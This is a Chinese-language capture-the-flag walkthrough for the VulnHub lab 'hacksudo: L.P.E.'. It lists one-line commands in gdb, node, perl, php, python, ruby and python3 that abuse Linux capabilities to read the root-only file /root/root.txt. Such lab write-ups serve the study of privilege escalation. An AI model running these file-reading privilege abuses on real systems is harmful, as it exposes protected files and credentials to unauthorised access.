vulnhub刷題記錄(hacksudo: L.P.E.)-增2

語言: CN / TW / HK
  • 英文名稱 :hacksudo: L.P.E.
  • 中文名稱 :hacksudo:LPE
  • 釋出日期 :2021 年 5 月 16 日
  • 難度 :容易
  • 描述 :這個盒子是為提高 Linux 特權升級技能而建立的,希望大家喜歡,hacksudo LPE 更新將很快上傳。這是測試版。找到 root.txt 標誌,將其提交到 Discord 上的 mybox 頻道。
  • 下載地址https://www.vulnhub.com/entry/hacksudo-lpe,698/

挑戰3:特權能力濫用挑戰,主線: ailx10:vulnhub刷題記錄(hacksudo: L.P.E.)

7、Challenge 3(Capabilities Abusing Challenge)

7.1 gdb Abusing

gdb -nx -ex 'python print(open("/root/root.txt").read())' -ex quit
檢視特權檔案

7.2 node abusing

node -e 'process.stdout.write(require("fs").readFileSync("/root/root.txt"))'
檢視特權檔案

7.3 perl Abusing

perl -ne print /root/root.txt
檢視特權檔案

7.4 php Abusing

export LFILE=/root/root.txt
php -r 'readfile(getenv("LFILE"));'
檢視特權檔案

7.5 python Abusing

python -c 'print(open("/root/root.txt").read())'
檢視特權檔案

7.6 ruby Abusing

ruby -e 'puts File.read("/root/root.txt")'
檢視特權檔案

7.7 python3 Abusing

python3 -c 'print(open("/root/root.txt").read())'